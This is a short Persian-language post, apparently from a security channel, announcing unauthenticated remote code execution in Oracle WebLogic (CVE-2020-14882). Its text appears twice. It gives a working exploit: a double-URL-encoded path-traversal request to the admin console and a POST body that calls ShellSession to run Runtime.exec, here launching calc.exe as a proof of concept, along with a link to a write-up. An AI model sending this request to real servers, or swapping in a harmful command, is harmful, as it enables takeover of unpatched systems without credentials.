آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت
CVE-2020–14882
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@UNIDENTIFIED_TM 🌹
بدون نیاز به احراز هویت
CVE-2020–14882
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@UNIDENTIFIED_TM 🌹